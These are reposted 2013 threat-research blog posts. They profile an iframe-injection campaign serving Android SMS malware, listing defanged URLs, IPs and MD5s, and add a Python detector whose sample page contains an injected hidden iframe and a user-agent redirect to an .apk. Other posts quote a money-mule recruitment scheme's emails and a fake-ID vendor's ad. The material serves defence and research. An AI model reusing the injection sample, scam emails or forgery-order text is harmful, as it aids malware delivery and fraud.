Rogue iFrame Injected Web Sites Lead to the AndroidOS/FakeInst/Trojan-SMS.J2ME.JiFake Mobile Malware

September 16, 2013

A currently ongoing malicious campaign, relying on iFrames injected into legitimate Web sites, segments mobile visitors from the rest of the traffic and exposes them to fraudulent, legitimate-looking variants of the AndroidOS/FakeInst/Trojan-SMS.J2ME.JiFake mobile malware.

Let's dissect the campaign, expose the domain portfolio currently/historically known to have been involved in it, and list all the malicious MD5s known to have been pushed by it.

iFrame-injected domains hosting the mobile traffic segmentation script, all parked on the same IP (93.170.109.193):

Sample mobile malware MD5s pushed by the campaign:

Phone back location: hxxp://depositmobi.com/getTask.php/task=updateOpening&s= - 93.170.107.130

Parked on the same IP (93.170.107.130) are also the following domains, which participate in the campaign's infrastructure:

The following malicious mobile malware MD5s are known to have phoned back to the same IP in the past:

Also worth emphasizing: we have a decent number of malicious Windows samples known to have phoned back to the same IP in the past, presumably an attempt by fellow cybercriminals to monetize the traffic through an affiliate program.

Actual download location of a sample of the mobile malware:
hxxp://mediaworks3.com/getfile.php?dtype=dle&u=getfl&d=FLVPLayer - 78.140.131.124

The following mobile malware serving domains are also known to have resolved to the same IP (78.140.131.124) in the past:

As well as the following malicious MD5s:
MD5: 8cfebfa7175e6e9a10e2a9ade4d87405
MD5: 4e5af55dd6a310bced83eb08c9a635b3

Thanks to the commercial availability of DIY iFrame-injecting platforms, the current commoditization of hacked/compromised accounts across multiple verticals, the efficiency-oriented mass SQL injection campaigns, and the existence of beneath-the-radar malvertising campaigns, cybercriminals are perfectly positioned to continue monetizing mobile traffic for fraudulent/malicious purposes.
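As an added defender-side example (not code from the original post), the script below scans a page's HTML for the two artefacts of this campaign: an injected iframe that is hidden or points off-site, and an inline script that branches on a mobile user-agent before redirecting. The sample page and its host names are constructed for the demonstration.

```python
"""Detect injected iframes and mobile user-agent segmentation scripts in HTML.

Hypothetical defender-side checker (not part of the original post). It flags
(a) iframes that are hidden, 1x1 or load an off-site host and (b) inline
scripts that sniff navigator.userAgent for mobile tokens and then redirect.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tokens a mobile-segmentation script typically looks for in navigator.userAgent.
MOBILE_UA_TOKENS = ("android", "j2me", "midp", "symbian", "iphone", "blackberry")


class _Collector(HTMLParser):
    """Collects iframe attributes and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []        # one attribute dict per <iframe>
        self.scripts = []        # one string per inline <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1] += data


def _dimension(value):
    """Parse the leading integer of a width/height value such as '0' or '1px'."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def _is_hidden(attrs):
    """True for frames styled invisible or sized to at most 1x1 pixel."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    dims = [_dimension(attrs.get(k, "")) for k in ("width", "height")]
    return any(d is not None and d <= 1 for d in dims)


def find_suspicious_iframes(html, site_host):
    """Return (src, reason) pairs for iframes that are hidden or load an off-site host."""
    c = _Collector()
    c.feed(html)
    findings = []
    for attrs in c.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host   # relative src = same site
        reasons = []
        if host != site_host and not host.endswith("." + site_host):
            reasons.append("off-site host " + host)
        if _is_hidden(attrs):
            reasons.append("hidden frame")
        if reasons:
            findings.append((src, ", ".join(reasons)))
    return findings


def find_mobile_segmentation_scripts(html):
    """Return inline scripts that test navigator.userAgent for mobile tokens and redirect."""
    c = _Collector()
    c.feed(html)
    hits = []
    for body in c.scripts:
        low = body.lower()
        if ("navigator.useragent" in low and any(t in low for t in MOBILE_UA_TOKENS)
                and ("location" in low or "document.write" in low)):
            hits.append(body.strip())
    return hits


# Constructed sample page: one legitimate embed, one injected hidden iframe,
# and a user-agent sniffing redirect; all host names are invented.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://example-legit.test/embed/player" width="400" height="300"></iframe>
<iframe src="http://injected-example.test/seg.php" width="0" height="0" style="display:none"></iframe>
<script>
if (/android|j2me/i.test(navigator.userAgent)) { window.location = "http://injected-example.test/app.apk"; }
</script>
</body></html>"""

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_PAGE, "example-legit.test"):
        print("iframe", src, "->", why)
    for s in find_mobile_segmentation_scripts(SAMPLE_PAGE):
        print("segmentation script:", s)
```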

Updates will be posted as soon as new developments take place.

Summarizing Webroot's Threat Blog Posts for August

August 30, 2013

The following is a brief summary of all of my posts at Webroot's Threat Blog for August, 2013. You can subscribe to Webroot's Threat Blog RSS Feed, or follow me on Twitter:

01. ‘Malware-infected hosts as stepping stones’ service offers access to hundreds of compromised U.S based hosts
02. New ‘Hacked shells as a service’ empowers cybercriminals with access to high page rank-ed Web sites
03. Fake ‘iPhone Picture Snapshot Message’ themed emails lead to malware
04. Malicious Bank of America (BofA) ‘Statement of Expenses’ themed emails lead to client-side exploits and malware
05. Cybercriminals spamvertise fake ‘O2 U.K MMS’ themed emails, serve malware
06. One-stop-shop for spammers offers DKIM-verified SMTP servers, harvested email databases and training to potential customers
07. Fake ‘Apple Store Gift Card’ themed emails serve client-side exploits and malware
08. Newly launched managed ‘malware dropping’ service spotted in the wild
09. Cybercrime-friendly underground traffic exchange helps facilitate fraudulent and malicious activity
10. From Vietnam with tens of millions of harvested emails, spam-ready SMTP servers and DIY spamming tools
11. DIY Craigslist email collecting tools empower spammers with access to fresh/valid email addresses
12. Bulletproof TDS/Doorways/Pharma/Spam/Warez hosting service operates in the open since 2009
13. DIY automatic cybercrime-friendly ‘redirectors generating’ service spotted in the wild
14. Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase
15. Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and malicious activity – part two

This post has been reproduced from Dancho Danchev's blog.

Profiling a Novel, High Profit Margins Oriented, Legitimate Companies Brand-Jacking Money Mule Recruitment Scheme

August 29, 2013
Over the years, I've been actively researching the money mule recruitment epidemic: providing actionable (real-time/historical) intelligence on their activities, exposing their DNS infrastructure, offering an exclusive peek inside the administration panels utilized by money mules, and emphasizing current and emerging tactics applied by the individuals orchestrating the final stage of a fraudulent operation, the cash-out process through basic risk-forwarding.

Catch up with previous research on the money mule recruitment problem:
In this post, I'll profile a novel money mule recruitment scheme that involves high profit margins -- of course for the ones organizing the scheme -- through a direct and, most importantly, (pseudo) legal brand-jacking of a gullible business owner's brand name, enticing him/her into opening a merchant account for processing E-commerce transactions coming from other, equally gullible and socially engineered mules.

It all begins with an email coming from a non-existent "environmental enterprise", that in this particular case is abusing Google's brand in an attempt to increase the probability of a successful interaction with the socially engineered business owners:

Sample email:
Environmental enterprise searching for representation internationally
5% commission on 200K cash flow originated from promotion and sales of proprietary research articles

Necessary conditions:
- Own a company
- Be reachable on daily basis through E-mail, phone or Skype
- Proper execution of all planned undertakings

In case if being interested, please provide:
- Name and Surname
- Age
- Telephone number (including country code)
- City and Country
- Email

Please answer to: NAME@googleapp-consult.com

Faithfully yours,
HR dept

Those who reply are kindly asked to open a merchant bank account using their own company data, and are assured that, despite the fact that the Web site selling the bogus 'research articles' will be using their (legitimate) business brand's name and contact details, they will still receive their 5% commission on 200,000/250,000 EUR in anticipated revenue, which would naturally be coming directly from other mules participating in the fraudulent scheme. Moreover, even though the business owner will have his company brand, logo and contact information listed on the Web site, he/she will have zero visibility into the non-existent purchasing process for this research, as "all customer service, sales, technical logistics, etc. are to be handled by us."

Why would a potential cybercrime syndicate want a socially engineered business owner to open a merchant bank account using his/her own data? Pretty simple. In my previous research on the standardization of the money mule recruitment process, I emphasized how money mules are often vetted through online-based surveys, which always ask questions that are important from a mule recruiter's perspective, such as: when did you first open your bank account, and do you have any limitations on incoming/outgoing monetary transactions on it?

However, an established company benefits from the trust it has already built with its financial institution/service of choice, meaning that it will not only get its merchant account opened, but will also successfully pass the majority of the verification mechanisms for high-volume transactions that the financial institution/service has put in place.

Sample reply email:
Thank you for your reply.

We are a company involved in development, branding and launching of several web media and IT projects involved in consulting on green technology, renewables and alternative energy sources. Several of the projects are being currently launched online and each one will need to have a card payment interface. This collaboration refers to opening a merchant account for online credit card acceptance (E-commerce).

We would need your company to open a merchant account for card acceptance and handle the receivables derived from the sales generated by each project. A bank/payment provider will facilitate data needed for website integration with their E-commerce payment gateway. We will handle the technical side of such integration in full.

We will brand the website under your company, therefore the administrative company data listed on the website will be yours, but all customer service, technical logistics and sales are to be handled by us. The products sold will be proprietary research articles and information packages on green technology, renewables and alternative energy sources.

Incoming proceedings from sales will be settled by the bank (or the payment provider) into your business bank account on a time scale defined by the bank (or the payment provider).
These sale proceedings will be transferred to us, minus your commission and expenses incurred. The volume of monthly payments processed through the merchant account will be in the order of EUR 200,000 - EUR 250,000 per month in the initial months. The expected rise is roughly 5-6% every month. The commission proposed to you stands at 5% of the mentioned volume.

All the expenses related to the operation including the banking and transactions fees and the merchant account setup and related fees are to be covered by us. If you agree in principle, I will provide the contract draft to define the legal terms of our collaboration.

Yours sincerely,

Michael Torti
General Manager
ECOFIN Projects (Gibraltar)
Tel/Fax: +350 2006 1287


Who are ECOFIN Projects (ecofinservices.net - 50.63.220.106)? Nothing more than a cybercrime-friendly "marketing agency" at its best.

Sample About Us description:
Ecofin is offering outstanding solutions which are useful in maximizing revenues that are generated through a wide range of investment sectors and global assets. A wide range of services and financial opportunities are being offered for manufacturers, developers, owners as well as financial investors interested in our niche investment portfolios and services.

We are operating as a globally safe company as well as involving risk and integrity management expertise that brings together practical experience along with cutting edge, innovative engineering and technologies. The company is research based which is primarily focused on environmental sectors, alternative energy, infrastructure, as well as utility all around the globe.

The firm is practicing a fundamental and basic approach while it comes to managing its clientele assets. Ecofin is useful in developing, branding as well as launching exclusive information sales podiums based on alternative, as well as green technological sources along with IT and web media themes. The company is dedicated to providing its clients with the highest levels of quality services and investment returns within the niche industries that we focus upon.

Contact details:
+350 200 67911 (Gibraltar)
+852 5808 2461 (Hong Kong)
+54 11 5984 1154 (Buenos Aires)
+44 20 3051 6249 (London)
Skype: ecofin2013
Suite 4, 209 Main Street
Gibraltar GBZ 1AA

A potentially socially engineered business owner would then be contacted with a similar email:
Please find the Contract draft attached, review and confirm your agreement with every point of it. The next step would be to provide the proper company data to be put in the contract and produce the final version for the signing.

Please review the showcase website:

This site will be copied into a new domain reflecting your company name and your company data.
As indicated, all customer service, sales, technical logistics, etc. are to be handled by us. You would need to open a merchant account for online credit card acceptance (E-commerce).

The customers will be from all over the world. All the issues related to sales, marketing, customer service, supply, logistics, etc. are to be handled by us. You will be required to open a merchant account for online credit card acceptance, receive the funds and transfer us the proceedings, as indicated in the contract draft with detail. No capital or any upfront payments from your side are required. If it is necessary to cover any upfront fees for the merchant account establishment, we will transfer such fees to you beforehand.

Sample Web site template offered as an example of what a socially engineered business owner's company-branded Web site would look like (greentechidea.com - 50.63.39.1):

Sample copy of the Contract:

Sample domains from the mule recruitment campaigns spamvertised over email:
googleapp-consult.com
googleapps-euro.com
worlds-trade.com
trades-consult.com
worlds-diploms.com

Sample name servers involved in the campaign:
NS1.ELCACAREO.NET - 184.82.62.16; 136.0.16.169; 184.82.204.70 - Email: shanghaiherald32@yahoo.com
NS2.ELCACAREO.NET - 6.87.78.121

The same email (shanghaiherald32@yahoo.com) is also known to have been used to register the following fraudulent/malicious domains:
badstylecorps.com
tvblips.net
viperlair.net

"The only green is money".

This post has been reproduced from Dancho Danchev's blog.


Cybercriminals Offer High Quality Plastic U.S Driving Licenses/University ID Cards

August 29, 2013
Continuing the series of blog posts profiling the most recent underground market propositions for high-quality fake passports/IDs/documents, in this post I'll focus on a cybercrime-friendly vendor that's exclusively targeting the U.S. market.

Go through previous research into the market for fake passports/IDs/documents:
Offering fake plastic driving licenses for 25+ U.S. states, as well as student IDs for major U.S. universities, at a static price of $150, the vendor not only currently outperforms competing vendors in terms of quality in this particular market segment -- within the cybercrime-friendly community in question -- but is also already receiving recommendations from other cybercriminals to raise the price of his underground market 'asset', indicating penetration pricing in action.

Payment methods accepted? Bitcoin, Western Union and Moneygram.

Sample underground market ad:
[VENDOR's NAME REDACTED] has over 25+ states on tap, along with 'secondaries' to offer, all of which are high quality, meaning in-state without issue, in most cases. All IDs contain UV (where applicable as some states don't), multispec-hologram, 1D/2D barcode and/or magstripe that will scan/swipe to read DMV/AAMVA license standard.

The vendor is requiring the following data from his potential customers:
Name - First, MI, Last
Address
DOB
Sex
Hair Color
Height
Weight
Eye color
Driver License number - if a number isn't provided one will be randomly generated
Endorsements and/or Restrictions - if not included these will be left blank
Scanned signature - if not provided you will receive a generic font signature

*****More/Less info may be required depending on the state requested

Scanned passport picture - no webcam pictures can be accepted.

If you cannot get a real passport picture and have a decent camera, please take a pic from the chest up against a white background/drywall with the flash 'ON'. I will handle the cropping aspect. Also try to have good lighting and when scanning use high resolution. You may also upload a signature. I ask that this be written using a black sharpie style pen to achieve the best results.

You may upload this info to sendspace.com or the file-sharing site of your choosing and forward me the download link. I will confirm reception via email and your order will begin processing. All IDs are 150USD with incentive to group buys. Payment can be made via BTC, WU, Moneygram. Payment will be collected upon completion and approval of your order.

Sample screenshots of the service's current 'inventory':

The market for fake passports/IDs/documents is prone to flourish, as more cybercriminals demand both scanned and plastic fake IDs to be later abused in related fraudulent schemes. Naturally, the market is quick to supply, and those who excel in their operational security and in the quality of their underground market 'assets' will begin occupying a decent market share within this underground market segment.

This post has been reproduced from Dancho Danchev's blog.